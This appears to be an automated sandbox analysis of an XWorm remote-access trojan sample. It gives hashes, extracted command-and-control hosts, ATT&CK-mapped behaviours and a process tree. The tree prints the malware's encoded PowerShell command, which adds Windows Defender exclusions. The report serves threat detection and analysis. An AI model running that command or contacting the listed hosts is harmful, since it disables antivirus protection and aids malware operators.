Analysis
-
max time kernel
93s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe
Resource
win10v2004-20241007-en
General
-
Target
0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe
-
Size
78KB
-
MD5
959ac550de9dc34474a8d8b16a050cfd
-
SHA1
d6ad271189c5ea66b6ac3268b18c05fa26b5f0f0
-
SHA256
0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0
-
SHA512
2c2d837164824fc1503a022a43793e5586c08d6b6b633e7fe828289489fad4c90a7c0a9fb3f2b6de093e901e9b957670063107b06b1e1ea474335806955ab735
-
SSDEEP
1536:HBx2Kk3000uEZf4Tl+XbctEjt8Y50vuzsB1nKzvpmvqmUte4xRZ4T:H+LE00bZ2leMEZlmBIvh/XZ4
Malware Config
Extracted
xworm
againzamel.zapto.org:1188
damoni.zapto.org:1188
-
Install_directory
%AppData%
-
install_file
Update.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000b000000023bb0-4.dat family_xworm behavioral2/memory/4636-12-0x0000000000F90000-0x0000000000FA8000-memory.dmp family_xworm -
Xworm family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe -
Executes dropped EXE 1 IoCs
pid Process 4636 Update.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4024 powershell.exe 4024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4636 Update.exe Token: SeDebugPrivilege 4024 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 3764 wrote to memory of 4024 3764 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe 84 PID 3764 wrote to memory of 4024 3764 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe 84 PID 3764 wrote to memory of 4024 3764 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe 84 PID 3764 wrote to memory of 4636 3764 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe 86 PID 3764 wrote to memory of 4636 3764 0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe"C:\Users\Admin\AppData\Local\Temp\0240fc167d3e9cabeb5a9e707ce52d7842e332e084bef5e22b72fc3ecd3488c0.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAagB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AagBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAaQBqACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
73KB
MD5d7cec6a9ad4510455738ee60758739d7
SHA19f935bff03c71d297d2ce3ca9c0ad1675bcf354d
SHA256f6f746d7b5a8bd106b2b3fddb8839c51f45bf34b58f37ed6ba3b3e4ddc215fb4
SHA512369b97be0d0793fc53936961e16c71cf016c801bf201dd3420bc87f1b4a9b9383359b22ce075e2d9452cbbcf329887ab62a05dab4854f9afcf61b22b0c4e9ae8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82